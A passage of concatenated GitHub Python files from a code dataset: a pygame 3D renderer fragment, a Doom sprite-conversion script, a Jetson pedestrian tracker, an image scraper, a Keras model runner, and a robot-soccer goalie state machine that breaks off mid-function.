self.triangles.append(triangle(self.world,(points[i],points[i+1],points[0]),self.col)) \r\n self.triangles.append(triangle(self.world,(points[i+1],points[0],points[1]),self.col))\r\n \r\n self.move(p)\r\n \r\n def move(self,pos):\r\n for t in self.triangles: t.move(pos)\r\n \r\n def rotate(self,val,pos,axis):\r\n for t in self.triangles: t.rotate(val,pos,axis) \r\n \r\n \r\n\r\n \r\nclass world(object):\r\n\r\n def __init__(self,s):\r\n self.vec = []\r\n self.vec2 = []\r\n self.pol = []\r\n self.col = []\r\n self.fpoint = (s.get_size()[0]/2,s.get_size()[1]/2)\r\n self.disp = s\r\n self.vcount = 0\r\n self.pcount = 0\r\n self.disp_polygon = [[0,0],[0,self.disp.get_size()[0],0],self.disp.get_size(),[0,self.disp.get_size()[1]]]\r\n self.background = None\r\n \r\n def addvec(self,v):\r\n self.vec.append(v)\r\n self.vec2.append(v.get2d())\r\n self.vcount += 1\r\n \r\n def addpol(self,l): \r\n self.pol.append(l)\r\n self.pcount += 1\r\n \r\n def movevec(self,v,val): self.vec[v] = addvec3d(self.vec[v],vec3d(val))\r\n \r\n def setvec(self,v,val): self.vec[v] = vec3d(val)\r\n \r\n def movepol(self,ID,val):\r\n for v in self.pol[ID]: self.vec[v] = addvec3d(self.vec[v],vec3d(val))\r\n \r\n def polrotate(self,ID,val,pos,axis): \r\n for v in self.pol[ID]: self.vec[v].rotate(val,pos,axis)\r\n \r\n \r\n def sortpol(self,p,c): \r\n unsorted_z = []\r\n sorted_z = []\r\n sorted_col = []\r\n ret = []\r\n \r\n for p0 in p:\r\n a = 0\r\n b = 0\r\n for n in p0:\r\n a += self.vec[n].pos[2]\r\n b += 1\r\n unsorted_z.append(round(a/b,3))\r\n sorted_z.append(round(a/b,3))\r\n \r\n \r\n sorted_z.sort()\r\n \r\n takensorts = []\r\n \r\n for u in unsorted_z:\r\n i = 0\r\n for s in sorted_z: \r\n taken = False\r\n if u == s:\r\n if len(takensorts) > 0:\r\n taken = False\r\n for t in takensorts:\r\n if i == t:\r\n taken = True\r\n break\r\n if not taken:\r\n ret.append(self.pol[i])\r\n sorted_col.append(self.col[i])\r\n takensorts.append(i) \r\n i += 1\r\n \r\n ret.reverse()\r\n sorted_col.reverse()\r\n \r\n return ret, sorted_col\r\n\r\n\r\n \r\n def update(self):\r\n i = 0\r\n while i < len(self.vec):\r\n self.vec2[i] = self.vec[i].get2d()\r\n i += 1\r\n \r\n \r\n def draw(self,mode): \r\n \r\n #draw background if exists\r\n \r\n if type(self.background) is pygame.Surface: \r\n self.disp.blit(self.background,(0,0))\r\n elif type(self.background) is tuple: self.disp.fill(self.background)\r\n else: self.disp.fill((0,0,0))\r\n \r\n pl,c = self.sortpol(self.pol, self.col)\r\n \r\n j = 0\r\n for p in pl:\r\n p2 = []\r\n p3 = []\r\n p1 = []\r\n neg = True\r\n \r\n for i in p: \r\n p2.append(addvec(self.vec2[i],vec2d(self.fpoint)).pos)\r\n if self.vec[i].pos[2] > 0: neg = False\r\n \r\n try: \r\n for i in pl[j+1]: p3.append(addvec(self.vec2[i],vec2d(self.fpoint)).pos)\r\n except IndexError: pass\r\n\r\n try: \r\n for i in pl[j-1]: p1.append(addvec(self.vec2[i],vec2d(self.fpoint)).pos)\r\n except IndexError: pass\r\n \r\n if not neg: \r\n if mode == 0: pygame.draw.lines(self.disp,(255,255,255),True,p2) \r\n elif mode == 1: \r\n if type(c[j]) is tuple: pygame.draw.polygon(self.disp,c[j],p2)\r\n elif type(c[j]) is pygame.Surface: pygame.gfxdraw.textured_polygon(self.disp,p2,c[j],0,0)\r\n \r\n j += 1\r\n \r\nclass win(object):\r\n\r\n def __init__(self,dim):\r\n self.display = pygame.display.set_mode(dim)\r\n self.clock = pygame.time.Clock()\r\n self.fps = 60\r\n \r\n def update(self,func):\r\n \r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n func(pygame.key.get_pressed())\r\n \r\n self.clock.tick(self.fps)\r\n pygame.display.flip()\r\n","repo_name":"ManuelCB/calc3D","sub_path":"calc3D.py","file_name":"calc3D.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23406574228","text":"import glob, os\r\nimport subprocess\r\nimport shutil\r\nimport collections\r\nimport struct\r\n\r\nmagick_path = \"magick\"\r\nspriteguy_path = \"spriteguy\"\r\n\r\nimage_names = []\r\nsizes = {}\r\noffsets = {}\r\nscale = 2\r\ntemp_files = []\r\nlight_levels = ['_L3', '_L2', '_L1', '_L0']\r\n#light_levels = ['_LB']\r\n\r\nfor file in glob.glob(\"*.spr\"):\r\n\tos.remove(file)\r\n\r\nfor file in glob.glob(\"*.png\"):\r\n\timage_names.append( os.path.splitext(os.path.basename(file))[0] )\r\n\r\nfor name in image_names:\r\n\tlump = name + \".lmp\"\r\n\tif os.path.exists(lump):\r\n\t\tf = open(lump, \"rb\")\r\n\t\ts = f.read(8)\r\n\t\tw, h, x, y = struct.unpack(\" 2:\r\n\t\tnewAngle = angle[2:4] + angle[0:2]\r\n\t\tnewName = name[:4] + newAngle\r\n\t\tprint(\"Flipping %s -> %s\" % (name, newName))\r\n\t\t\r\n\t\targs = [magick_path, 'convert', '-flop', name + \".png\", newName + \".png\"]\r\n\t\tsubprocess.check_call(args)\r\n\t\toffsets[newName] = offsets[name]\r\n\t\tsizes[newName] = sizes[name]\r\n\t\timage_names.append(newName)\r\n\t\ttemp_files.append(newName + \".png\")\r\n\t\r\n\t\t\r\nfor name in image_names:\r\n\tprint(\"Adding borders %s\" % name)\r\n\t\r\n\t# scale up\r\n\t'''\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-interpolate', 'Nearest', '-filter', 'point', '-resize', '200%', name + \".png\", name + \"_L3.png\"]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\t\r\n\t# Add 1px border so HL's bilinear filtering doesn't get to wrap pixels at the edges\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-bordercolor', 'transparent', '-border', '2x2', name + \".png\", name + \"_L3.png\"]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\t'''\r\n\twidth = sizes[name][0]+4\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-flip', '-gravity', 'north', '-extent', '%sx170' % width, name + \"_L3.png\", name + \"_L3.png\"]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\ttemp_files.append(name + \"_L3.png\")\r\n\r\n\t\r\nfor name in image_names:\r\n\tprint(\"Baking light levels %s\" % name)\r\n\t'''\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-fill', 'black', '-colorize', '90%', name + \"_L3.png\", name + \"_L0.png\"]\r\n\ttemp_files.append(name + \"_L0.png\")\r\n\toffsets[name + \"_L0.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-fill', 'black', '-colorize', '60%', name + \"_L3.png\", name + \"_L1.png\"]\r\n\ttemp_files.append(name + \"_L1.png\")\r\n\toffsets[name + \"_L1.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-fill', 'black', '-colorize', '30%', name + \"_L3.png\", name + \"_L2.png\"]\r\n\ttemp_files.append(name + \"_L2.png\")\r\n\toffsets[name + \"_L2.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\t'''\r\n\t# scale up\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-interpolate', 'Nearest', '-filter', 'point', '-resize', '200%', name + \".png\", name + \"_LB.png\"]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\t# Add 1px border so HL's bilinear filtering doesn't get to wrap pixels at the edges\r\n\targs = [magick_path, 'convert', '-background', 'transparent', '-bordercolor', 'transparent', '-border', '2x2', name + \"_LB.png\", name + \"_LB.png\"]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\targs = [magick_path, 'convert', '-fill', 'black', '-colorize', '99%', name + \"_LB.png\", name + \"_LB.png\"]\r\n\ttemp_files.append(name + \"_LB.png\")\r\n\toffsets[name + \"_LB.png\"] = offsets[name]\r\n\tsubprocess.check_call(args)\r\n\t\r\n\t# remove alpha\r\n\targs = [magick_path, 'convert', '-alpha', 'remove', '-background', 'blue', name + \"_LB.png\", name + \"_LB.png\"]\r\n\tsubprocess.check_call(args)\r\n\t'''\r\n\t\r\n\t\r\ncount = 0\r\npanims = collections.OrderedDict({})\r\nfor name in image_names:\r\n\tcount += 1\r\n\tangle = name[-1:]\r\n\tif angle == '0':\r\n\t\tbasename = name[:-2]\r\n\t\tif basename not in panims:\r\n\t\t\tpanims[basename] = []\r\n\t\tpanims[basename].append(name)\r\n\telse:\r\n\t\tfor level in light_levels:\r\n\t\t\tprint(\"Making upright sprites %s\" % (name + level))\r\n\t\t\tofs = offsets[name]\r\n\t\t\targs = [spriteguy_path, name + level + \".png[%s,%s]\" % (ofs[0], ofs[1]), name + level + \".spr\", \"type=upright\"]\r\n\t\t\tsubprocess.check_call(args)\r\n\t\t\t\r\nregulars = []\r\nfor anim in panims:\r\n\tprint(\"Making parallel sprites %s\" % anim)\r\n\tfor level in light_levels:\r\n\t\targs = [spriteguy_path]\r\n\t\tfor name in panims[anim]:\r\n\t\t\tofs = offsets[name]\r\n\t\t\targs.append(name + level + \".png[%s,%s]\" % (ofs[0], ofs[1]))\r\n\t\t\tif level == '_L3' or level == '_LB':\r\n\t\t\t\tregulars.append(name)\r\n\t\targs.append(anim + level + \".spr\")\r\n\t\targs.append(\"type=upright\")\r\n\t\tsubprocess.check_call(args)\r\n\t\t\r\n\t\r\n# Make an animation array def for angelscript\r\nanims = collections.OrderedDict({})\r\nfor name in image_names:\r\n\tbase = name[:4]\r\n\tangle = name[-1:]\r\n\tif angle == '0':\r\n\t\tcontinue\r\n\tif base not in anims:\r\n\t\tanims[base] = collections.OrderedDict({})\r\n\tframe = name[4]\r\n\tif not frame in anims[base]:\r\n\t\tanims[base][frame] = []\r\n\tanims[base][frame].append(name)\r\n\r\n\t\r\ndef base36(num):\r\n\tb36 = ''\r\n\tcharset = \"0123456789abcdefghijklmnopqrstuvwxyz\"\r\n\t\r\n\twhile num != 0:\r\n\t\tc = charset[num % 36]\r\n\t\tb36 = c + b36\r\n\t\tnum /= 36\r\n\t\tnum = int(num)\r\n\treturn b36\t\r\n\t\r\nfh = open(\"anims.as\", \"w\")\r\n\r\nsprite_path = \"d/\"\r\nsuperImages = []\r\n\r\nidx = 36\r\nfor base in anims:\r\n\tsprite_prefix = base.lower()[0]\r\n\tsprite_prefix = 'd'\r\n\tfh.write(\"array< array< array > > SPR_ANIM_%s = {\\n\" % base)\r\n\tfor lvl, level in enumerate(light_levels):\r\n\t\tfh.write(\"\\t{\\n\")\r\n\t\tfor i, key in enumerate(anims[base]):\r\n\t\t\tfh.write('\\t\\t{ ')\r\n\t\t\t\r\n\t\t\tfor k, frame in enumerate(sorted(anims[base][key])):\r\n\t\t\t\tcomma = \", \" if k < len(anims[base][key])-1 else \" \"\r\n\t\t\t\tnice_name = frame + level\r\n\t\t\t\tofs = offsets[frame]\r\n\t\t\t\tif lvl == 3 or len(light_levels) == 1:\r\n\t\t\t\t\tsuperImages.append(frame + \"_L3.png[%s,%s]\" % (ofs[0]*scale, ofs[1]*scale))\t\r\n\t\t\t\treal_name = sprite_prefix + base36(idx)\r\n\t\t\t\tfh.write('\"%s.spr\"%s' % (sprite_path + real_name, comma))\r\n\t\t\t\t#os.rename(frame + level + \".spr\", sprite_prefix + base36(idx) + \".spr\")\r\n\t\t\t\tidx += 1\r\n\t\t\t\r\n\t\t\tcomma = \",\" if i < len(anims[base])-1 else \"\"\r\n\t\t\tfh.write('}%s\\n' % comma)\r\n\t\tcomma = \",\" if lvl < len(light_levels)-1 else \"\"\r\n\t\tfh.write('\\t}%s\\n' % comma)\r\n\tfh.write(\"};\\n\")\r\n\t\r\n\t# Now make the array for death framesa\r\n\tfh.write(\"array SPR_ANIM_DEATH_%s = { \" % base)\r\n\tidx = 0\r\n\tfor k, reg in enumerate(regulars):\r\n\t\tnice_name = frame + level\r\n\t\tofs = offsets[frame]\r\n\t\tsuperImages.append(reg + \"_L3.png[%s,%s]\" % (ofs[0]*scale, ofs[1]*scale))\t\r\n\t\t#os.rename(reg + \".spr\", sprite_prefix + base36(idx) + \".spr\")\r\n\t\tcomma = \", \" if k < len(regulars)-1 else \" \"\r\n\t\tfh.write('\"%s.spr\"%s' % (sprite_path + sprite_prefix + base36(idx), comma))\r\n\t\tidx += 1\r\n\tfh.write(\"};\\n\")\r\n\t\r\nfh.close()\r\n\r\nsuperName = \"TROO\"\t\r\nprint(\"Making super sprite %s\" % superName)\r\nargs = [spriteguy_path] + superImages + [superName + \".spr\", \"type=upright\"]\r\nsubprocess.check_call(args)\r\n\r\n\r\n# cleanup\r\nfor file in temp_files:\r\n\tos.remove(file)","repo_name":"wootguy/sc_doom","sub_path":"tools/monster_maker (old maybe).py","file_name":"monster_maker (old maybe).py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34048445473","text":"import jetson.inference\nimport jetson.utils\nimport time\nimport cv2\nimport numpy as np \n\nfrom imutils.video import FPS\nimport imutils\nimport dlib\n\n\n#some constants - hello world\ninput_URI = \"peds.mp4\"\nthreshold = 0.5\nnetwork = \"ssd-mobilenet-v2\"\n#network = \"ssd-inception-v2\"\noverlay = \"box,lables,conf\"\nfpsFilt=0\ndispW= 720\ndispH=480\nfont=cv2.FONT_HERSHEY_SIMPLEX\n\n# load the object detection network\nnet = jetson.inference.detectNet(network, threshold)\n\n# create video sources & outputs\ncap = cv2.VideoCapture('ped.mp4')\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, dispW)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, dispH)\n\n# initialize the list of object trackers and corresponding class\n# labels\ntrackers = []\nframe_num = 1\nskip_frames = 30\n\n\n# process frames until the user exits\nwhile cap.isOpened():\n\n timeStamp = time.time()\n\n # capture the next image\n ret,img = cap.read()\n if ret ==True:\n\n height = img.shape[0]\n width = img.shape[1]\n \n \n # convert to jetson inference format\n frame=cv2.cvtColor(img,cv2.COLOR_BGR2RGBA).astype(np.float32)\n frame=jetson.utils.cudaFromNumpy(frame)\n \n # convert to rgb for dlib processing\n rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n if (len(trackers) == 0 or frame_num % skip_frames == 0):\n # detect objects in the image (with overlay)\n print(\"detection run for frame no = \", frame_num)\n if len(trackers) == 0:\n len_trackers_zero_run = True\n detections = net.Detect(frame,width,height)\n for detect in detections: #for each detections\n ID=detect.ClassID\n item=net.GetClassDesc(ID)\n if item == \"person\":\n similarity = False #for current detected item similarity initialised to flase\n top= int(detect.Top)\n left=int(detect.Left)\n bottom=int(detect.Bottom)\n right=int(detect.Right)\n centerX = (right+left)/2\n centerY = (bottom+top)/2\n\n if len_trackers_zero_run: #if there are no objects in tracker then create the trackers with new detections\n # construct a dlib rectangle object from the bounding\n # box coordinates and start the correlation tracker\n print(\"first run trackers initialized\")\n t = dlib.correlation_tracker()\n rect = dlib.rectangle(left, top, right, bottom)\n t.start_track(rgb, rect)\n # update our set of trackers and corresponding class\n trackers.append(t)\n else: \n print(\"similarity check initialised\") \n for t in trackers:\n \n pos = t.get_position()\n\n # unpack the position object\n startX = int(pos.left())\n startY = int(pos.top())\n endX = int(pos.right())\n endY = int(pos.bottom())\n\n tcenterX = (endX+startX)/2\n tcenterY = (endY+startY)/2\n\n a = np.array((centerX, centerY))\n b = np.array((tcenterX,tcenterY))\n\n dist = np.linalg.norm(a-b)\n print(\"calculated distance = \", dist)\n if dist < 50 : #if the tracker object is close than 50 pixels for the current item \n similarity = True #iteration then break \n break \n elif dist > 50:\n similarity = False\n\n if similarity == False: \n # construct a dlib rectangle object from the bounding\n # box coordinates and start the correlation tracker\n print(\"similarity false loop activated\")\n t = dlib.correlation_tracker()\n rect = dlib.rectangle(left, top, right, bottom)\n t.start_track(rgb, rect)\n\n # update our set of trackers and corresponding class\n trackers.append(t)\n \n\n # put text and draw the bounding box\n cv2.putText(img, \"detection mode\", (left, top - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)\n\n cv2.rectangle(img,(left,top),(right,bottom),(0,0,255),2)\n if len_trackers_zero_run:\n print(\"total objects for zero run = \", len(trackers))\n len_trackers_zero_run = False \n \n # otherwise, we've already performed detection so let's track\n\t # multiple objects\n else:\n # loop over each of the trackers\n for t in trackers:\n # update the tracker and grab the position of the tracked\n # object\n t.update(rgb)\n pos = t.get_position()\n\n # unpack the position object\n startX = int(pos.left())\n startY = int(pos.top())\n endX = int(pos.right())\n endY = int(pos.bottom())\n\n # draw the bounding box from the correlation object tracker\n cv2.rectangle(img, (startX, startY), (endX, endY),\n (0, 255, 0), 2)\n cv2.putText(img, \"tracking\", (startX, startY - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 255, 0), 2) \n\n \n dt=time.time()-timeStamp\n timeStamp=time.time()\n fps=1/dt\n fpsFilt=.9*fpsFilt + .1*fps\n #print(str(round(fps,1))+' fps')\n cv2.putText(img,str(round(fpsFilt,1))+' fps',(0,30),font,1,(0,0,255),2)\n cv2.putText(img,str(round(len(trackers)))+' persons detected',(0,60),font,1,(0,230,255),2)\n cv2.imshow('detCam',img)\n if cv2.waitKey(1)==ord('q'):\n break\n else:\n break\n\n frame_num += 1 \n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"ParasCodesAi/objectTracking","sub_path":"detectNtrac.py","file_name":"detectNtrac.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7640355199","text":"#!/usr/bin/python3\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport sys\n\n\n#site = 'https://www.codespeedy.com/'\n#site = sys.argv[1]\nsite = input(\"Please provide the site address : \")\n\nresponse = requests.get(site)\nsoup = BeautifulSoup(response.text, 'html.parser')\nimage_tags = soup.find_all('img')\nurls = [img['src'] for img in image_tags]\n#print(f'URLs { urls }')\n#noOfImgs = int(sys.argv[2])\nnoOfImgs = int(input(\"Please provide number of images to download : \") or len(urls))\n\ndef create_dir(dir):\n if not os.path.exists(dir):\n os.makedirs(dir)\n print(\"Created Directory : \", dir)\n else:\n print(\"Directory already existed : \", dir)\n return dir\n\ncustDir=create_dir(input(\"Please provide the download path : \") or 'downloaded_images')\n\nfor url in urls[0:noOfImgs]:\n filename = re.search(r'/([\\w_-]+[.](jpg|gif|png))$', url)\n if not filename:\n print(\"Regular expression didn't match with the url: {}\".format(url))\n continue\n with open( f'{custDir}/{filename.group(1)}', 'wb') as f:\n if 'http' not in url:\n url = '{}{}'.format(site, url)\n response = requests.get(url)\n f.write(response.content)\n\nprint(f\"Download complete, downloaded images can be found in {custDir} directory!\")\n","repo_name":"richiricha/ImageDownload","sub_path":"python/downpic.py","file_name":"downpic.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4350409784","text":"from tensorflow.keras.optimizers import Adam, SGD, RMSprop\n\nfrom models.core.validation.ModelRunner import ModelRunner\n\n\nclass BaseModelRunner(ModelRunner):\n def __init__(self, model_builder, image_size=(224, 224), batch_size=128, augmentation=None):\n params, model_builders = self._get_model_compile_params_model_builders(model_builder)\n super().__init__(model_builders, params, [image_size] * len(model_builders), batch_size, augmentation)\n\n @staticmethod\n def _get_model_compile_params_model_builders(model_builder):\n params = [\n {\"dropout\": .7, \"optimizer\": Adam(.00001)},\n {\"dense\": 128, \"optimizer\": Adam()},\n {\"optimizer\": SGD(.005)},\n {\"dense\": 128, \"optimizer\": RMSprop(.0001)},\n {\"dense\": 128, \"dropout\": .1, \"optimizer\": Adam(.00001)}\n ]\n model_builders = [model_builder] * len(params)\n return params, model_builders\n","repo_name":"mbirkholzupc/mai_ci_ddmr","sub_path":"models/core/validation/BaseModelRunner.py","file_name":"BaseModelRunner.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41837924207","text":"import memory, pose, commands, head, util, cfgpose, cfgstiff, mem_objects, core, random, numpy, math\nfrom task import Task\nfrom state_machine import *\nfrom memory import *\nfrom sets import Set\n#from enum import Enum\n\nclass Ready(Task):\n def run(self):\n commands.stand()\n if self.getTime() > 3.0:\n self.finish()\n\n#Fields = Enum('Fields', 'A B')\n#Modes = Enum('Modes', 'passive attacking defending')\n#AttackingStates = Enum('AttackingStates', 'start approach rotate dribble align kick')\n#DefendingStates = Enum('DefendingStates', 'start')\nclass Fields: \n A=0\n B=1\n\nclass Modes:\n passive=0\n attacking=1\n defending=2\n\nclass EnemyGoalStates:\n unknown=0\n center=1\n left=2\n right=3\n\nclass AttackingStates:\n start=0\n approach=1\n rotate=2\n dribble=3\n align=4\n kick=5\n\nclass DefendingStates:\n start=0\n walk_center=1\n walk_left=2\n walk_right=3\n walk=4\n block=5\n sit=6\n block_left=7\n block_right=8\n\nfield = Fields.A\nmode = Modes.passive\nenemy_state = EnemyGoalStates.unknown\ncurrent_state = AttackingStates.start\nlast_mode_change_time = 0\nr_goal_dist_filtered = 0.\n\n#attacking globals\nrotation_dir = 1.\nlast_ball_seen_time = 0\nnext_head_time = 0\nkick_start_time = 0\nkick_sent = False\nrecovering_from_kick = False\nattack_left = False\n\n#defending globals\nif_seen_history_constant =9\nif_seen_history = [0]*if_seen_history_constant\nif_seen_history_counter = 0\n\nlast_inf_constant = 2\nlast_x = [0]*last_inf_constant\nlast_y = [0]*last_inf_constant\nlast_xv = [0]*last_inf_constant\nlast_yv = [0]*last_inf_constant\nlast_bearing = [0]*last_inf_constant\nlast_distance = [0]*last_inf_constant\nlast_av_px = [0]*last_inf_constant\nlast_state_counter = 0\n\ndt = 1.0/30.0\nfriction = 0.35\n\nlast_head_time = 0\nlast_head_pan = 1.2\nbody_turning_flag = 0\nblock_trigger_flag = 0\npose_sent = False\nnum_times_sent = 0\npose_start_time = 0\ndefense_time = 0\ndefense_delay_time = 0\nwalk_start_time = 0\n\ndef tanhController(err, kx, max_cmd):\n return max_cmd * numpy.tanh(kx * err)\n\nclass Playing(StateMachine):\n class Stand(Node):\n def run(self):\n commands.stand()\n if self.getTime() > 5.0:\n self.finish()\n\n class Win(Node):\n def toPose(self, pose, time):\n global pose_sent, pose_start_time, num_times_sent\n commands.setStiffness()\n times_to_send = 1\n if num_times_sent < times_to_send:\n for i in range(2, core.NUM_JOINTS):\n val = util.getPoseJoint(i, pose, False)\n if val != None:\n joint_commands.setJointCommand(i, val * core.DEG_T_RAD)\n\n joint_commands.send_body_angles_ = True\n joint_commands.body_angle_time_ = time * 1000.0\n walk_request.noWalk()\n kick_request.setNoKick()\n num_times_sent = num_times_sent+1\n pose_start_time = self.getTime()\n #print \"Sending pose at time \" + str(pose_start_time) + \"! #\" + str(num_times_sent)\n\n if num_times_sent >= times_to_send and ((self.getTime() - pose_start_time) > time):\n #print \"DONE!\"\n return True\n else:\n return False\n\n def walk(self, vx, vy, vt):\n commands.setWalkVelocity(vx+0.1, vy+0.0, vt+0.0)\n\n def stop(self):\n commands.setWalkVelocity(0.,0.,0.)\n\n def track_ball(self):\n commands.setHeadPan(0, 2.0)\n # global last_ball_seen_time, next_head_time\n # ball = memory.world_objects.getObjPtr(core.WO_BALL)\n # max_vel = 10.0\n # if ball.seen:\n # last_ball_seen_time = self.getTime()\n # return\n # commands.setHeadPan(ball.visionBearing, numpy.abs(core.joint_values[core.HeadYaw] - ball.visionBearing) / max_vel)\n # else:\n # if((self.getTime() - last_ball_seen_time) > 1.0 and self.getTime() > next_head_time):\n # target = random.uniform(-1.5, 1.5)\n # dt = numpy.abs(core.joint_values[core.HeadYaw] - target) / max_vel\n # commands.setHeadPan(target, dt)\n # next_head_time = self.getTime() + dt\n\n def walk_to(self, obj, r_threshold):\n global have_lock, facing_center, at_center\n # memory.speech.say(\"Walking!\")\n sloc = mem_objects.world_objects[robot_state.WO_SELF].loc\n t = -mem_objects.world_objects[robot_state.WO_SELF].orientation\n cx = obj.visionDistance * numpy.cos(obj.visionBearing)\n cy = obj.visionDistance * numpy.sin(obj.visionBearing)\n r = numpy.sqrt(cx*cx+cy*cy)\n t_err = numpy.arctan2(cy, cx)\n #print \"local target x,y = \" + str(cx) + \",\" + str(cy)\n\n if(r < r_threshold):\n #print \"Stopping\"\n self.stop()\n return True\n\n x_vel = tanhController(cx, 10.0 / 1000.0, 0.4)\n y_vel = tanhController(cy, 10.0 / 1000.0, 0.4)\n t_vel = 0.0\n #print \"vel x,y,t = \" + str(x_vel) + \",\" + str(y_vel) + \",\" + str(t_vel)\n self.walk(x_vel,y_vel,t_vel)\n return False\n\n#DEFENSE============================================================================================\n def defense_start(self):\n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n global if_seen_history_constant , last_inf_constant\n global if_seen_history , if_seen_history_counter , last_x , last_y , last_xv , last_yv , last_bearing , last_distance , last_state_counter,last_av_px\n global friction, dt\n global last_head_time, last_head_pan, body_turning_flag, block_trigger_flag, pose_sent, num_times_sent\n\n # commands.stand()\n commands.setHeadTilt(-13)\n ball = mem_objects.world_objects[core.WO_BALL]\n if_seen_history[if_seen_history_counter] = ball.seen;\n if_seen_history_counter = (if_seen_history_counter + 1)%if_seen_history_constant;\n seen_times = sum(if_seen_history)\n\n x = 0.\n y = 0.\n d = 0.\n bearing = 0.\n xv = 0.\n yv = 0.\n px = 0.\n if(seen_times > ( if_seen_history_constant/2 )): # It is actually seen\n #print \"seen_times = \" + str(seen_times) \n if(ball.seen):\n bearing = ball.visionBearing\n distance = ball.visionDistance\n x = ball.loc.x\n y = ball.loc.y\n xv = ball.absVel.x\n yv = ball.absVel.y\n else:\n return\n \n if( abs(xv) > 3000 or abs(yv) > 3000) :\n return\n\n \n #print \"x = \" + str(x) + \" y = \" + str(y) + \" xv = \" + str(xv) +\" yv = \" + str(yv)\n \n last_av_bearing = sum(last_bearing)/last_inf_constant\n\n last_x[last_state_counter] = x\n last_y[last_state_counter] = y\n last_xv[last_state_counter] = xv\n last_yv[last_state_counter] = yv\n last_distance[last_state_counter] = distance\n last_bearing[last_state_counter] = bearing\n\n # av_x = x\n # av_y = y\n # av_xv = xv\n # av_yv = yv\n # av_distance = distance\n # av_bearing = bearing\n\n av_x = sum(last_x)/last_inf_constant\n av_y = sum(last_y)/last_inf_constant\n av_xv = sum(last_xv)/last_inf_constant\n av_yv = sum(last_yv)/last_inf_constant\n av_distance = sum(last_distance)/last_inf_constant\n av_bearing = sum(last_bearing)/last_inf_constant\n\n px = av_x + (av_xv*abs(av_xv)/(2*1000*friction))\n last_av_px[last_state_counter] = px\n av_px = sum(last_av_px)/last_inf_constant\n last_state_counter = (last_state_counter + 1)%last_inf_constant\n\n #print \"av_vx = \" + str(av_xv) + \"\\tav_vy = \" + str(av_yv)\n #print(\"av_px = \") + str(av_px) + \" \\tseen_times = \" + str(seen_times)\n\n #print \"Avg : av_x = \" + str(av_x) + \" av_y = \" + str(av_y) + \" av_xv = \" + str(av_xv) +\" av_yv = \" + str(av_yv)\n\n if(av_bearing > 1.4):\n av_bearing = 1.4\n elif(av_bearing < -1.4):\n av_bearing = -1.4\n\n d_turning = abs(av_bearing - last_av_bearing)/2.5\n if(d_turning < 0.1):\n d_turning = 0.1\n elif(d_turning > 2):\n d_turning = 2\n commands.setHeadPan(av_bearing, d_turning)\n\n #print \"av_xy = \" + str(av_xv) + \"\\tav_y = \" + str(av_yv) + \"\\tflag = \" + str(body_turning_flag) + \"\\tPAN: \" + str(core.joint_values[core.HeadYaw])\n if( (abs(av_xv) < 300 and abs(av_yv) < 300 ) or body_turning_flag == 1):\n head_pan = core.joint_values[core.HeadYaw]\n if(head_pan > 0.2):\n body_turning_flag = 1\n commands.setWalkVelocity(0.1, 0.4, 0.13)\n elif(head_pan < -0.2):\n body_turning_flag = 1\n commands.setWalkVelocity(0.15,-0.3,-0.05)\n else:\n commands.stand()\n body_turning_flag = 0\n return\n\n if(av_xv > -200 or (abs(av_yv)+0.01)/(abs(av_xv)+0.01) > 1):\n #print(\" No!!!!: Vx > 0 or Vx / Vy large , Vx = \") + str(av_xv) + \" Vy = \" + str(av_yv) + \" seen_times = \" + str(seen_times)\n block_trigger_flag = 0\n return\n elif( av_px > -1100 ):\n #print(\" No!!!!: Ball too short px = \") + str(av_px) + \" seen_times = \" + str(seen_times)\n block_trigger_flag = 0\n return \n elif( av_distance < 1200 and av_xv < -100):\n block_trigger_flag = block_trigger_flag + 1\n lamda = av_yv / av_xv\n intercept = av_y - lamda*av_x\n hit_goal_line = lamda*(-1300) + intercept\n\n if(block_trigger_flag > 2):\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n \n block_trigger_flag = 0\n if( hit_goal_line < -200 and hit_goal_line > -550):\n #print \" Left : Yes: av_px = \" + str(av_px) + \" hit_goal_line = \" + str(hit_goal_line)\n pose_sent = False\n num_times_sent = 0\n current_state = DefendingStates.block_right\n #choice = \"right\"\n #self.postSignal(choice)\n elif( hit_goal_line > 200 and hit_goal_line < 550):\n #print \" Right : av_px = \" + str(av_px) + \" hit_goal_line = \" + str(hit_goal_line)\n pose_sent = False\n 